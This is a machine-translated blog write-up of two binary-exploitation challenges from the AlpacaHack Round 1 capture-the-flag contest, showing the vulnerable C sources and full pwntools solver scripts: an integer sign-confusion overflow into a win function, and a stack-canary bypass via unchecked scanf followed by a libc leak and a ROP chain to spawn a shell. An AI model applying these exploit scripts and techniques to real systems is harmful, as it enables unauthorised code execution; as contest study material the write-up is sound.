AlpacaHack Round 1 (Pwn) Writeup - Part 1

This page has been machine-translated from the original page.

I finally wrote the long-postponed writeup for AlpacaHack Round 1 (Pwn).

I ran out of energy, so I will cover the remaining two challenges another time.

Reference: Challenges - AlpacaHack Round 1 (Pwn)

echo(Pwn)
hexecho(Pwn)
Summary

echo(Pwn)

A service for reachability check.

The challenge provided C source code and an executable binary.

First, I checked the binary’s protection mechanisms.

Next, I looked at the provided source code.

Since PIE is disabled, it looks like a simple buffer overflow into the win function should give the flag, but the get_size function validates the input size, so the overflow cannot be exploited so easily.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUF_SIZE 0x100

/* Call this function! */
void win() {
  char *args[] = {"/bin/cat", "/flag.txt", NULL};
  execve(args[0], args, NULL);
  exit(1);
}

int get_size() {
  // Input size
  int size = 0;
  scanf("%d%*c", &size);

  // Validate size
  if ((size = abs(size)) > BUF_SIZE) {
    puts("[-] Invalid size");
    exit(1);
  }

  return size;
}

void get_data(char *buf, unsigned size) {
  unsigned i;
  char c;

  // Input data until newline
  for (i = 0; i < size; i++) {
    if (fread(&c, 1, 1, stdin) != 1) break;
    if (c == '\n') break;
    buf[i] = c;
  }
  buf[i] = '\0';
}

void echo() {
  int size;
  char buf[BUF_SIZE];

  // Input size
  printf("Size: ");
  size = get_size();

  // Input data
  printf("Data: ");
  get_data(buf, size);

  // Show data
  printf("Received: %s\n", buf);
}

int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  echo();
  return 0;
}

While looking for a way to bypass the abs call in get_size, I found that, as shown below, it cannot correctly compute the absolute value when given signed INT_MIN.

Reference: c - Why is abs(INT_MIN) still -2147483648? - Stack Overflow

In get_data, however, the size is treated as an unsigned int rather than an int, so by supplying signed INT_MIN (-2147483648) as input, it becomes possible to push more than 0x100 bytes of data onto the stack.

I ultimately obtained the flag with the following solver.

from pwn import *

context.arch = "amd64"
context.endian = "little"

# Set target
TARGET_PATH = "./echo"
exe = ELF(TARGET_PATH)

target = remote("34.170.146.252", 17360, ssl=False)

# Exploit
# https://stackoverflow.com/questions/11243014/why-is-absint-min-still-2147483648
target.recvuntil(b"Size: ")
payload = b"-2147483648"
target.sendline(payload)

target.recvuntil(b"Data: ")
payload = flat(
    b"A"*0x110,
    b"B"*8,
    0x4011f6
)
target.sendline(payload)

# Finish exploit
target.interactive()
target.clean()

This confirmed that the correct flag was Alpaca{s1Gn3d_4Nd_uNs1gn3d_s1zEs_c4n_cAu5e_s3ri0us_buGz}.

hexecho(Pwn)

Stack canary makes me feel more secure.

As in the previous challenge, an executable binary and source code were provided.

This time, however, stack canaries appear to be enabled in the binary.

To solve the challenge, I examined the following source code.

It is not very different from the previous challenge, but the size validation has been removed and the input is read in hexadecimal.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUF_SIZE 0x100

int get_size() {
  int size = 0;
  scanf("%d%*c", &size);
  return size;
}

void get_hex(char *buf, unsigned size) {
  for (unsigned i = 0; i < size; i++)
    scanf("%02hhx", buf + i);
}

void hexecho() {
  int size;
  char buf[BUF_SIZE];

  // Input size
  printf("Size: ");
  size = get_size();

  // Input data
  printf("Data (hex): ");
  get_hex(buf, size);

  // Show data
  printf("Received: ");
  for (int i = 0; i < size; i++)
    printf("%02hhx ", (unsigned char)buf[i]);
  putchar('\n');
}

int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  hexecho();
  return 0;
}

Since there is no size validation, exploiting the buffer overflow itself is easy, but we still need to bypass the canary.

At first, however, I could not find a way to exploit the buffer overflow without either leaking or corrupting the canary.

Reading the official writeup, I learned that the key point is that the return value of scanf("%02hhx", buf + i); is never checked.

Reference: Writeup for AlpacaHack Round 1 (Pwn) - Let’s Do CTF

scanf Specifications and How to Exploit Them

In glibc 2.35, which this challenge binary uses, scanf is implemented as follows.

This function internally uses __vfscanf_internal and returns its done value.

int __scanf (const char *format, ...)
{
  va_list arg;
  int done;

  va_start (arg, format);
  done = __vfscanf_internal(stdin, format, arg, 0);
  va_end (arg);

  return done;
}

Reference: glibc/stdio-common/scanf.c at glibc-2.35 · bminor/glibc

The vfscanf-internal.c file is roughly 3,000 lines long, and honestly I did not feel like reading all of it, but I did notice several places where ++done is executed in code that appears to perform reads.

Since scanf returns the number of items successfully read, it also seems likely that the lines immediately before ++done are where the actual reads occur.

Reference: glibc/stdio-common/vfscanf-internal.c at glibc-2.35 · bminor/glibc

Reference: scanf(3) - Linux manual page

For scanf, when the input does not match the format string, it returns an input error and leaves the offending data in the input stream.

I verified this locally with the following program: when a character that does not match the format is entered, it remains in stdin afterward.

#include <stdio.h>

int main() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  char buf[100];
  int ret;
  for(int i = 0; i < 9; i++) {
    buf[i] = '-';
  }
  for(int i = 0; i < 9; i++) {
    ret = scanf("%02hhx", buf+i);
    printf("BUF ==> %c\n", buf[i]);
    printf("RET ==> %d\n", ret);
  }
  return 0;
}

Below is the state of stdin after entering a character that does not match the format.

You can see that the character I entered remains in stdin even after calling scanf.

You can also see that when invalid input causes an error, the buffer is not overwritten.

An interesting detail here is that sign characters such as + and - can be interpreted as hexadecimal input, but they do not satisfy the %02hhx format and therefore cause an input error. This lets us consume data from the input stream while skipping scanf’s write into the buffer.

Because this challenge fills the buffer one byte at a time using the code below, we can exploit this behavior to use the buffer overflow without overwriting the canary bytes.

void get_hex(char *buf, unsigned size) {
  for (unsigned i = 0; i < size; i++) scanf("%02hhx", buf + i);
}

Bypassing the Canary

Based on the above, I successfully bypassed the canary with the following payload.

payload = flat(
    b"+"*0x118,
    b"42"*0x100
)

# Exploit
target.recvuntil(b"Size: ")
target.sendline(str(0x118 + (0x100//2)).encode())

target.recvuntil(b"Data (hex): ")
target.sendline(payload)

After that, all that remained was to build a working ROP chain and get a shell.

Leaking libc

To get a shell with ROP, I next needed a way to leak a libc address.

At first I considered leaking it via ROP, but looking more carefully, the line printf("%02hhx ", (unsigned char)buf[i]); simply prints the contents of the stack.

Using this, I was able to obtain the address of libc_start_main_ret from the dumped stack.

Exploit

After successfully bypassing the canary and leaking a libc address, I exploited the buffer overflow to execute a ROP chain, obtained a shell, and then got the flag.

The final solver I wrote is shown below.

One thing that tripped me up was that when I tried to overwrite the buffer via scanf("%02hhx", buf + i);, giving input such as 22134000 somehow caused it to be written as 02 02 13 40.

Separating the input values with spaces made it parse them correctly.

from pwn import *

# Set context
# context.log_level = "debug"
context.arch = "amd64"
context.endian = "little"
context.word_size = 64
context.terminal = ["/mnt/c/Windows/system32/cmd.exe", "/c", "start", "wt.exe", "-w", "0", "sp", "-s", ".75", "-d", ".", "wsl.exe", '-d', "Ubuntu", "bash", "-c"]

# Set gdb script
gdbscript = f"""
b *0x401321
continue
"""

# Set target
TARGET_PATH = "./hexecho"
exe = ELF(TARGET_PATH)

# Run program
is_gdb = True
is_gdb = False
if is_gdb:
    target = gdb.debug(TARGET_PATH, aslr=False, gdbscript=gdbscript)
else:
    target = remote("34.170.146.252", 29181, ssl=False)
    # target = process(TARGET_PATH)

rop_ret = " ".join([f"{x:0{2}X}" for x in p64(0x401370)]).encode()

payload = b"+"*0x118
payload += b" "
payload += rop_ret
payload += b" "
payload += " ".join([f"{x:0{2}X}" for x in p64(0x401322)]).encode()
payload += b"+"*0x8

# Exploit
target.recvuntil(b"Size: ")
target.sendline(str(0x118+8+8+8).encode())

target.recvuntil(b"Data (hex): ")
target.sendline(payload)

r = target.recvline_startswith("Received").decode().split(" ")[1:-1]

libc_start_main_ret = int("0x" + "".join(r[296:296+8][::-1]),16)
libc_base = libc_start_main_ret - 0x29d90
print(hex(libc_start_main_ret))


# Stage 2
rop_str_bin_sh = " ".join([f"{x:0{2}X}" for x in p64(libc_base+0x1d8678)]).encode()
rop_pop_rdi_ret = " ".join([f"{x:0{2}X}" for x in p64(libc_base+0x1bbea1)]).encode()
rop_system = " ".join([f"{x:0{2}X}" for x in p64(libc_base+0x50d70)]).encode()

payload = b"+"*0x118
payload += b" "
payload += rop_ret
payload += b" "
payload += rop_pop_rdi_ret
payload += b" "
payload += rop_str_bin_sh
payload += b" "
payload += rop_system
payload += b"+"*0x30

target.recvuntil(b"Size: ")
target.sendline(str(0x118 + 0x30).encode())

target.recvuntil(b"Data (hex): ")
target.sendline(payload)

# Finish exploit
target.interactive()
target.clean()

Summary

I finally got around to writing this long-delayed writeup for AlpacaHack Round 1 (Pwn).

I had planned to write up the remaining two challenges as well, but I ran out of energy, so for now I only covered these two.

Published Oct 19, 2024

Aspiring Reverse Engineer and CTF Player (Team: 0nePadding). Passionate about WinDbg and Anti-Virus internals. OSCP / CISSP. Working at Microsoft Japan, but all views expressed are my own.かしわば(@kash1064) on Twitter